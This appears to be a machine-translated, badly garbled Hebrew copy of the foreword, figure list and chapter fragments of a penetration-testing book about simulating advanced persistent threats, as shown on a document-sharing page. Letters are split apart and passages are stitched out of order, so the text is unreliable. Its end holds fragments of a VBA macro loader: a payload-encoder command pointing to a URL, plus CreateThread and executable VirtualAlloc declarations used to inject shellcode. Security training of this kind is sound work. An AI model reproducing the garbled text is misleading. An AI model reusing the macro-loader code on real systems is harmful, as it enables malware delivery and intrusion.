‫אנ שים שמתעניינים בא ב ט חת ‪ IT‬והם פר סמו גם הר בה מידע א חר‪ .‬זה כ ל ל מידע ע ל‬

‫מער כת ה ט לפון‪ ,‬ש ספ קית ה ט ל קום ההו לנדית ‪ -‬באותה ת קופה שנ קראה ‪ PTT -‬לא‬
‫הייתה מרוצה מדי )הם עדיין לא ה בינו שא ב ט חה באמצעות ערפו ל הוא רעיון גרוע‬
‫בי סודו!(‪ ,‬כמו גם מידע ע ל ב חירת מנעו לים ‪ ,‬אם להז כיר ר ק כמה טרי קים‪ .‬הדיון בנו שאים‬
‫כא לה עם אנ שים בע לי דעות דומות הפך ב סופו ש ל ד בר להת כנ סויות חוד שיות‪ ,‬מ סי בות‬
‫א קראיות ואירועי הא קרים ) במ לונות ו ב חניונים ‪-‬תמיד כו ל ל קי שוריות לאינ טרנ ט‬
‫במהירות ג בוהה(‪ .‬כיום‪,‬י שנם אפי לו ח ל לי הא קרים ש בהם אנ שים לא ר ק בונים או‬
‫שו ברים תו כנה‪ ,‬א לא מ שתמ שים ב כ ל מיני ט כנו לוגיה מודרנית בדר כים חד שות‪ .‬אז מה‬
‫שהת חי ל פעם כתנועת מ חתרת ק שור כיום הי ט ב ב ח ברה המודרנית‪.‬‬
‫מהר קדימה ל שנת ‪ 2000.‬לא חר מ ספר תפ קידים ב ח ברות שונות‪ ,‬ש ב סופו ש ל ד בר‬
‫הו בי לו לתפ קיד רא שי ב ק בוצה מהודרת בא חד ממר כזי המ ח ש בים הגדו לים בהו לנד‪ ,‬שני‬
‫ח ברים ואני ה ח ל טנו שנ קים ע ס ק בעצמנו‪ .‬בועת האינ טרנ ט פ שו ט התפוצצה ו ח ש בנו‬
‫שזה רעיון טו ב לה קים ח ברתייעוץ המתמ קדת בא ב ט חת מידע‪ .‬למר בה המז ל‪ ,‬תמיד‬
‫היה לנו האמונה‪" ,‬אם לא נצ לי ח‪ ,‬אנ חנו צרי כים לפ חות להיות מ סוג לים לומר לעצמנו‬
‫שנהננו"‪ .‬מע טידענו‪.‬‬
‫המ שימה הרא שונה הגיעה כ ש בי קרתי ב ס קנדינ ביה ונא לצתי לנ ס ח חוזה למ ב חן‬
‫ה חדירה הזה ב חדר ש ל מ לון שה ל כתי לידו תוך כדי שי חה עם ה ל קו ח הפו טנציא לי‬
‫וה שתמ שתי במ כ שיר הפ ק ס ש להם כדי ל ש לו ח אותו‪ .‬אפי לו לא היה לנו שם למיזם הזה‬
‫ש לנו‪.‬‬
‫למרות שה בועה התפוצצה ו ח ברות אינ טרנ ט שונות נא לצו ל סגור את ה חנות‪ ,‬המ ש כנו‬
‫ו ב חרנו ב סופו ש ל ד בר ב שם ‪ Madison Gurkha‬מ כיוון ש לא מצאנו שם דומיין המ כי ל‬
‫מ שהו שהת קר ב ל שירות שני סינו ל ספ ק‪ .‬היתרונות ש ל ה שם הא קזו טי הזה היו ר בים‪,‬‬
‫ה ח ל מהעו בדה שאתה צריך לאיית אותו לפ חות ש לו ש פעמים ) כדי שהוא באמתייצר ב‬
‫במו חם ש ל מי שנא לץ להתמודד איתנו(‪ ,‬ועד להנ חה שאנ שים ע שו )ועדיין לע שות(‬
‫שהיינו קונג לומר ט בינ לאומי עם מ טה אי שם מ חוץ להו לנד‪.‬‬
‫באותה ת קופה לא היה לנו צורך במ ח ל קת מ כירות ו שיוו ק‪ .‬הר שת האי שית ש לנו‬
‫התר ח בה ו לא היו הר בה ע ס קים ש סיפ קו את ה שירותים ש לנו‪ ,‬אז המ לצות מי לו ליות‬
‫ה ביאו את ההזדמנויות לפת חנו‪ .‬באותה ת קופה ע שינו ר ק הער כות פגיעות ש ליי שומי‬
‫אינ טרנ ט ות שתיות ‪ ICT,‬ו ח ל קן בד קנו כא שר ה ל קו חות ש לנו באמת התעניינו בה שפעה‬
‫ש ל הת קפות אמיתיות ע ל ס בי בות ‪-ICT‬ה ש להם‪ .‬מ כיוון ש כמע ט ו לא היו כ לים זמינים‪,‬‬
‫היינו צרי כים ליצור את היתרונות ש לנו‬
‫ס קריפ טים כדי לה ק ל ע ל חיינו‪ .‬לפעמים גם פור סמו ניצו לים באינ טרנ ט ) בעי קר ב ק בוצות‬
‫דיון(‪ ,‬א ב ל היית צריך להר כי ב אותם בעצמך והם תמיד ה כי לו איזה פגם‪ ,‬כך שי לדי ת סרי ט‬
‫שר ק הר כי בו את הד בר‪ ,‬א ב ל לא ה בינו את ה בעיה בפוע ל‪ ,‬לאי כ לו לה שתמ ש ב קוד )היית‬
‫צריך לע שות כמה שינויים ק לים כדי שתו כ ל לה שתמ ש בו(‪ .‬בזמן כתי בת שורות א לה‪ ,‬כ לים‬
‫כמו ‪ Metasploit‬ו‪Nessus -‬זמינים באופן נר ח ב ותו כניות ט לוויזיה פופו לריות כמו מר‬
‫רו בו ט מציגות את ה כ לים ה ל לו בע בודה‪.‬‬
‫א ב ל א ב ט חת ‪-IT‬ה מת קדמת‪ .‬זה תמיד היה‪ ,‬ו כנראה תמידיהיה‪ ,‬איזון מעורער בין הת קפות‬
‫והגנות‪ .‬ה כ לים הזמיניםי שתפרו ויהפ כו ל חז קיםיותר ו כ לים מת קדמיםיותריהפ כו לזמינים‪.‬‬
‫א ב ל ר ק בידיו ש ל מומ חה מ ש כי ל הםיו סיפו ערך אמיתי‪ .‬אותו אדם לא ר ק מ בין את היתרונות‬
‫ש ל ה כ לים א לא גםיודע את מג ב לותיהם ו כיצד לפר ש את התוצאות‪.‬‬
‫ווי ל א ל סופ הוא מומ חה א חד כזה‪ .‬התמז ל מז לי לע בוד עם ווי ל כ שהצ טרף למדי סון גור קה‬
‫ב‪ .6002-‬באותה ת קופה היינו בני שנתיים והתר ח בנו מה ס טאר ט‪-‬אפ ש ל ש לו שה אנ שים‬
‫ל ח ברתייעוץ א ב ט חת ‪IT‬הייעודית המ בו ס סת שאנ חנו היום‪ Wil .‬עזר לנו לד חוף את ג בו לות‬
‫מע טפת בדי קות הא ב ט חה עודיותר וע שה זאת מאז‪ .‬הוא תמיד חיפ ש נ קודות תורפה‬
‫חד שות ורוצה שתאגידים ומו סדותיהיו מודעים לאיומים הא חרונים‪ .‬ספר זה מ כי ל דוגמאות‬
‫ר בות ערך לאותם איומים מת קדמים‪.‬‬
‫כא שר הארגון ש לך לא ר ק מ חפ ש ציון חיו בי בר שימת ה" ב ש לי טה"‪ ,‬א לא באמת רוצה לדעת‬
‫אם הוא מ סוג ל לעמוד ב סוג ההת קפות המת קדמות מאוד שמתר ח שות כיום ב קנה מידה‬
‫עו למי‪ ,‬כדאי שת קרא את ה ספר הזה ‪ .‬ודא שה ח ברה שאתה שו כר ל ביצוע הער כות א ב ט חת‬
‫‪IT‬י כו לה באמת ל בצע הת קפות כמו א לה‪ .‬שו ב‪ Wil ,‬מראה שמומ חה א ב ט חת ‪IT‬אמיתי לא‬
‫ר קיודע לה שתמ ש ב כ לים זמינים‪ ,‬א לא גם מ סוג ל ל ח שו ב מ חוץ ל קופ סה ו לפת ח הת קפות‬
‫נו ספות ומת קדמות בעת הצורך‪ .‬סרי קות פגיעות רגי לות מועי לות כדי ל שמור ע ל הת שתית‬
‫ש לך ב קנה א חד; בדי קות חדירה בפוע ל באמצעות ט כני קות מת קדמות כמו א לו המתוארות‬
‫ב ספר זהי ספ קו לארגון ש לך את התו בנה הדרו שה לג בי האם אתה באמת שו ל ט בא ב ט חת‬
‫‪-IT‬ה ש לך או עצמת את עיניך ל ס כנות האמיתיות ב חוץ תוך הו ספת סימון לר שימות ה בדי קה‬
‫ש לך‪.‬‬
‫אמ ס טרדם‪ 5 ,‬באו ק טו בר ‪2016‬‬

‫הנ ס ואן דה לוי‬
‫מיי סד ‪Madison Gurkha BV‬‬
WILEY ‫ה ס כם רי שיון למ שתמ ש קצה ש ל‬
Wiley EULA. ‫ כדי לג שת ל ספר הא ל ק טרוני ש ל‬www.wiley.com/go/eula ‫ע בור א ל‬

Advanced Penetration Testing Hacking The World's Most Secure Networks

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Advanced Penetration Testing Hacking The World's Most Secure Networks

Uploaded by

Copyright:

Available Formats

Machine Translated by Google

‫‪Machine Translated by Google‬‬

‫ת ש כ ח מ כ ל מה שאתה חו ש ב שאתהיודע ע ל בדי קת חדירה‬

‫פר ק ‪ 7:‬מ ש ח קי מ ל חמה‬

‫מער כות הפע לה‬

‫איור ‪1.1‬זרימת ר שת ‪Pharmattix‬איור‬

‫פר ק ‪ 2:‬גני בת מ ח קר‬

‫פר ק ‪ 3:‬שוד ש ל המאה הע שרים וא חת‬

‫איור ‪4.2‬ה בעיה מ ספר א חת במ סך האזע קה הזה ש ל ‪AlienVault SOC‬היא‬

‫א ס טר טגיית ניהו ל פגיעות‪.‬‬

‫איור ‪ 4.7 Metasploit‬עו שה ע בודה מצוינת ב ל ט ש ט ש את הת קפת ‪2015-5012.‬‬

‫איור ‪4.9‬ההפע לה ש ל ‪ Meterpreter‬מוע ברת דרך ‪ SSH‬ונראית תמימה ל‪SDI-‬‬

‫איור ‪4.14‬ניצו ל פגיעות ‪ -ScriptHost‬ב כדי לה ס לים למער כת‪.‬‬

‫איור ‪4.15 Armitage‬הופך הר בה מ שימות מייגעות לעניין ב ל חיצה א חת‪.‬‬

‫איור ‪-AT-4‬ה ‪5.2‬ה סו ביי טי )מימין( היה עות ק ש ל מער כת ‪MILAN‬הצרפתית‬

‫איור ‪ 5.6‬מ סך נ חיתה ש ל ‪Veil-Evasion.‬‬

‫איור ‪ 5.9‬קו בץ ההפע לה המהודר מו כן ל שימו ש‪.‬‬

‫איור ‪ 5.12‬ספרייתיי שומי ‪Solid Edge.‬‬

‫איור ‪ 5.14‬ס כימת מ ק ל ט ת חתון ב‪Solid Edge 3D. -‬‬

‫איור ‪6.4‬הדוגמה ה ב לתי נמנעת ש ל ‪VirusTotal.‬‬

‫איור ‪6.7‬ת לות וו קר מציג נתי בי ‪ DLL‬מ לאים‪.‬‬

‫איור ‪ 6.14‬ש ל ב חמי שי‪ :‬מנוי לע ס ק‪.‬‬

‫פר ק ‪ 7:‬מ ש ח קי מ ל חמה‬

‫איור ‪ 8.4‬שרת ‪ C2‬מנה צומת מא ס טר חד ש‪.‬‬

‫איור ‪ 9.2‬ק ב לת מע טפת‪.‬‬

‫איור ‪ 9.4‬מהיריותר ו ק ליותר לע בוד באנג לית‪.‬‬

‫בדי קת חדירה מת קדמת‬

‫אם לצ ט ט את הווארד ראף‪ " ,‬לאירד ג שם כ שנ ח בנה את התי בה‪".‬‬

‫מגיע מעג ל מ לא‬

‫איום מתמ שך מת קדם )‪(APT‬‬

‫ה ש ל כת ר שת ר ח בה כדי לתפו ס את הפירות הת לויים הנמו כים ) כדי לער ב ב את‬

‫הר ח בת הר שאות ‪-‬ה שג גי שה מ קומית ו ב סופו ש ל ד בר למנה ל דומיין‪.‬‬

‫קו לוניזציה ש ל ר שת ‪-‬הר ח ב את ה ש לי טה לנ כ סי ר שת א חרים באמצעות אי שורי‬

‫מתמיד ‪-‬ה ב ט ח המ שך ש לי טה באמצעות ‪Command & Control.‬התמדה‬

‫ט כנו לוגיית הדור ה בא‬

‫יומני בי קורת כ כ ל הנראה לאיפגעו ב שום ד בר כא שר תו קף מיומן בי ס ס את‬

‫כ ל מער כת דואר א ל ק טרוני )או כ ל מער כת א חרת לצורך העניין(י כו לה לה ק לי ט‬

‫ת ש כ ח מ כ ל מה שאתה חו ש ב שאתהיודע ע ליו‬

‫איך ה ספר הזה מאורגן‬

‫כ ל א חד מהפר קים ש ל ספר זה דן בני סיון ש לי בדוגמנות ‪ APT‬מו ל תע שיות ספציפיות‪.‬‬

‫פר ק ‪"4,‬פארמה קארמה"‪ ,‬בו חן הת קפה נגד ח ברת תרופות וע ל ר קע זה מציג‬

‫אז‪ ,‬ב לי די בורים נו ספים ‪-‬המ שי כו עם התו כנית‪.‬‬

‫פר ק ‪)1‬אי( א ב ט חה ש ל ר שומות רפואיות פר ק רא שון זה מראה כיצד ניתן‬

‫ת קרית " קיין"‪.‬‬

‫ראה את המאמר המ קורי ב כתו בת ‪http://www.securityfocus.com/news/122‬‬

‫מ בוא ל סימו לציה מת קדמת‬

‫גי שות שונותיי ב חנו לאורך ספר זה‪.‬‬

‫כן‪ .‬בה ח ל ט הייתי מאפיין את זה כאנומ ליה‪.‬‬

‫למע שה‪ ,‬ה ט כנו לוגיה נראתה כמו איור ‪1.1.‬‬

‫איור ‪1.1:‬זרימת ר שת ‪Pharmattix‬‬

‫איור ‪1.2:‬תפ קידי מ שתמ ש‬

‫חומר שיוו ק ‪PHARMATTIX‬‬

‫אנו מג בירים את הנגי שות ואת הפרודו ק טי ביות ש ל התרגו ל ש לך‪.‬‬

‫מער כת ר שומות וי כו לה ליי בא את הר שומות ש לך ו ל ספ ק פתרון עו בד‪ ,‬פעמים‬

‫למידע נו סף‪ ,‬אנא א ל תה ס ס לפנות א לינו!‬

‫כ ש ברו ס שנייר מד בר‪ ,‬זה א‬

‫היו לפני ‪ 10‬שנים‪ ,‬לא בעיות הא ב ט חה שי ש לנו היום"‪.‬‬

‫כ ל תפ קיד מ שתמ ש ה שתמ ש באימות דו‪-‬גורמי; כ לומר‪ ,‬בנו סף ל שם מ שתמ ש או‬

‫מ ש לו ח מ טען ח ל ק ‪ 1:‬למד כיצד לה שתמ ש במא קרו ‪VBA‬‬

‫ שנוצר ע לידי‬VBA ‫ קוד מא קרו‬1-1 ‫ר שימה ש ל‬

ga-nai -i 5 -a x86 --platform Windows EXE=c:\temp\payload.exe URL=http://www.wherever

CreateThread Lib "kernel32" ‫ פונ קציה‬Private Declare PtrSafe

Qgsztm = VirtualAlloc(0, UBound(Wizksxyu), &H1000, &H40)